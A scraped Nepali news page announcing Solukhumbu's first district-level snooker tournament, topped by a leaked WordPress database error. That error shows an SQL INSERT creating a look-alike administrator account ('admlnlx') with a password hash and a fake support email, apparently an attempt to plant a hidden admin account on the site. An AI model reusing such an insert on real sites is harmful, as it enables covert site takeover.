WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRzdNmKiJgRVuxGsZJn9CMEPiV7WmP0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 00:48:31', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुमा जिल्लास्तरीय पहिलो पटक स्नूकर प्रतियोगिता – Gaule Khabar

सोलुखुम्बुमा जिल्लास्तरीय पहिलो पटक स्नूकर प्रतियोगिता

सोलुखुम्बुमा जिल्लास्तरीय पहिलो पटक स्नूकर प्रतियोगिता
सामाजिक सञ्जाल

काठमाण्डौ । सोलुखुम्बुमा पहिलो पटक जिल्लास्तरीय स्नूकर प्रतियोगिता हुने भएको छ ।

यही भदौ ११ देखि १४ गतेसम्म स्नूकर खेललाई व्यवसायिक र अनुशासित बनाउँदै व्यवसायिक खेलाडी उत्पादन गर्ने उद्देश्यले स्टार युथ क्लबको आयोजनामा सदरमुकाम सल्लेरीमा प्रतियोगिताको आयोजना हुन लागेको हो।

आठ स्थानीय तहबाट प्रत्येक पालिकाबाट प्रतियोगिताका लागि चार जनाका दरले सहभागी गराउने गरी सबै पालिकामा छनोट खेल सकिएको छ । लिखुपिके गाउँपालिकाबाट एक जना मात्र सहभागी
भएकाले प्रतियोगीतामा २९ खेलाडीबीच प्रतिस्पर्धा हुने भएको छ ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका